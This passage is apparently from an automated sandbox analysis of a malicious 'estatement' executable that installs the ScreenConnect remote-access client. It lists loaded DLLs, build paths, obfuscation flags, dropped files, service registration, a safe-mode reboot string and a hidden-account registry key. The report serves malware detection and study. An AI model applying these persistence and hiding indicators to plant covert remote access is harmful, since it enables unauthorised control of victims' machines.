                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: certificate valid
                                  Source: estatement020134230003.exe.virus.exeStatic file information: File size 5620176 > 1048576
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3584763010.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3571728405.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831721302.00000000018A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832786752.0000000003231000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1830979750.00000000017E0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1751313920.00000000002FD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1731279979.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: estatement020134230003.exe.virus.exe, 577f6a.msi.2.dr, MSI8342.tmp.2.dr, 577f6c.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI8362.tmp.2.dr, MSI8567.tmp.2.dr, 577f6b.rbs.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3584763010.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: estatement020134230003.exe.virus.exe, 577f6a.msi.2.dr, 577f6c.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI76AF.tmp.1.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831214463.0000000001842000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831214463.0000000001842000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3584763010.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1840249663.0000000013240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  Source: 0.0.estatement020134230003.exe.virus.exe.15178ec.3.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.2.estatement020134230003.exe.virus.exe.f50000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: ScreenConnect.Client.dll.2.drStatic PE information: 0x94F102E7 [Mon Mar 8 13:28:07 2049 UTC]
                                  Source: MSI76AF.tmp.1.drStatic PE information: real checksum: 0x2f213 should be: 0x1125d0
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x55de92
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_009270B0 push eax; mov dword ptr [esp], ecx0_2_009270C1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_0582B510 push eax; mov dword ptr [esp], ecx7_2_0582B511
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_0582CE70 push eax; mov dword ptr [esp], ecx7_2_0582CE71
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05EA85E0 push es; ret 7_2_05EA85F0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05EA8590 push es; ret 7_2_05EA85A0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05EAA421 pushad ; ret 7_2_05EAA433
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05EAC001 push es; ret 7_2_05EAC010
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05EAED2C push es; ret 7_2_05EAED30
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_063A55D0 push esp; ret 7_2_063A5603
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B35096D push ebx; retf 8_2_00007FFD9B35098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3508CD push ebx; retf 8_2_00007FFD9B35098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B65C1B6 push cs; iretd 8_2_00007FFD9B65C23F
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B657523 push ebx; iretd 8_2_00007FFD9B65756A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B3409D8 push ebx; retf 10_2_00007FFD9B34098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B3408CD push ebx; retf 10_2_00007FFD9B34098A

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: c:\program files (x86)\screenconnect client (8d1a70ac1b2b845c)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-8114-d4f9e6f7d40d}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8362.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8567.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8362.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8567.tmpJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (8d1a70ac1b2b845c)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000002.1737608274.00000000050B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: estatement020134230003.exe.virus.exe, 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000004.00000003.1729285999.0000000004F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
